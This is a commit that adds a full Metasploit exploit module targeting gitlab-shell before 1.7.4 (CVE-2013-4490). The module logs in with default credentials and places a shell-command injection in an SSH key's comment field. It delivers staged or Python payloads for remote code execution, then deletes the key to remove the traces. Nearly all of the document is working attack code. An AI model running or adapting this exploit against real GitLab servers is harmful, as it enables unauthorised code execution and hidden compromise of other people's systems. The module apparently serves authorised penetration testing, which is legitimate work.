Land rapid7#3621, @kaospunk's exploit for gitlab-shell CVE-2013-4490 command injection

jvazquez-r7 · jvazquez-r7 · commit 4cfd2abd8d1c · 2014-08-15T09:17:16.000-05:00
diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gitlab-shell Code Execution',
+      'Description'    => %q(
+        This module takes advantage of the addition of authorized
+        ssh keys in the gitlab-shell functionality of Gitlab. Versions
+        of gitlab-shell prior to 1.7.4 used the ssh key provided directly
+        in a system call resulting in a command injection vulnerability. As
+        this relies on adding an ssh key to an account valid credentials
+        are required to exploit this vulnerability.
+      ),
+      'Author'  =>
+        [
+          'Brandon Knight'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
+          ['CVE', '2013-4490']
+        ],
+      'Platform'  => 'linux',
+      'Targets'        =>
+        [
+          [ 'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Linux (x64)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86_64
+            }
+          ],
+          [ 'Unix (CMD)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat'      =>
+                    {
+                      'RequiredCmd' => 'openssl perl python'
+                    },
+                  'BadChars' => "\x22"
+                }
+            }
+          ],
+          [ 'Python',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'Payload' =>
+                {
+                  'BadChars' => "\x22"
+                }
+            }
+          ]
+        ],
+      'CmdStagerFlavor' => %w( bourne printf ),
+      'DisclosureDate' => 'Nov 4 2013',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'The username to authenticate as', 'root']),
+        OptString.new('PASSWORD',  [true, 'The password for the specified username', '5iveL!fe']),
+        OptString.new('TARGETURI', [true,  'The path to Gitlab', '/'])
+      ], self.class)
+  end
+
+  def exploit
+    login
+    case target['Platform']
+    when 'unix'
+      execute_command(payload.encoded)
+    when 'python'
+      execute_command("python -c \\\"#{payload.encoded}\\\"")
+    when 'linux'
+      execute_cmdstager(temp: './', linemax: 2800)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    key_id = add_key(cmd)
+    delete_key(key_id)
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
+    if res && res.body && res.body.include?('GitLab')
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def login
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')
+
+    # Get a valid session cookie and authenticity_token for the next step
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => 'request_method=GET',
+                            'uri'    => signin_page
+    )
+
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
+
+    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+
+    if res.body.include? 'user[email]'
+      @gitlab_version = 5
+      user_field = 'user[email]'
+    else
+      @gitlab_version = 7
+      user_field = 'user[login]'
+    end
+
+    # Perform the actual login and get the newly assigned session cookie
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => local_session_cookie,
+                            'uri'    => signin_page,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                "#{user_field}" => username,
+                                'user[password]' => password,
+                                'user[remember_me]' => 0
+                              }
+                          )
+
+    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
+
+    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
+
+    fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
+  end
+
+  def add_key(cmd)
+    if @gitlab_version == 5
+      @key_base = normalize_uri(target_uri.path.to_s, 'keys')
+    else
+      @key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
+    end
+
+    # Perform an initial request to get an authenticity_token so the actual
+    # key addition can be done successfully.
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => "request_method=GET; #{@session_cookie}",
+                            'uri'    => normalize_uri(@key_base, 'new')
+    )
+
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+    title = rand_text_alphanumeric(16)
+    key_info = rand_text_alphanumeric(6)
+
+    # Generate a random ssh key
+    key = OpenSSL::PKey::RSA.new 2048
+    type = key.ssh_type
+    data = [key.to_blob].pack('m0')
+
+    openssh_format = "#{type} #{data}"
+
+    # Place the payload in to the key information to perform the command injection
+    key = "#{openssh_format} #{key_info}';#{cmd}; echo '"
+
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => "request_method=GET; #{@session_cookie}",
+                            'uri'    => @key_base,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                'key[title]' => title,
+                                'key[key]' => key
+                              }
+                          )
+
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
+
+    # Get the newly added key id so it can be used for cleanup
+    key_id = res.headers['Location'].split('/')[-1]
+
+    key_id
+  end
+
+  def delete_key(key_id)
+    res = send_request_cgi(
+                             'method' => 'GET',
+                             'cookie' => "request_method=GET; #{@session_cookie}",
+                             'uri'    => @key_base
+                           )
+
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
+
+    # Remove the key which was added to clean up after ourselves
+    res = send_request_cgi(
+                             'method' => 'POST',
+                             'cookie' => "#{@session_cookie}",
+                             'uri'    => normalize_uri("#{@key_base}", "#{key_id}"),
+                             'vars_post' =>
+                             {
+                               '_method' => 'delete',
+                               'authenticity_token' => auth_token
+                             }
+                           )
+
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
+  end
+end
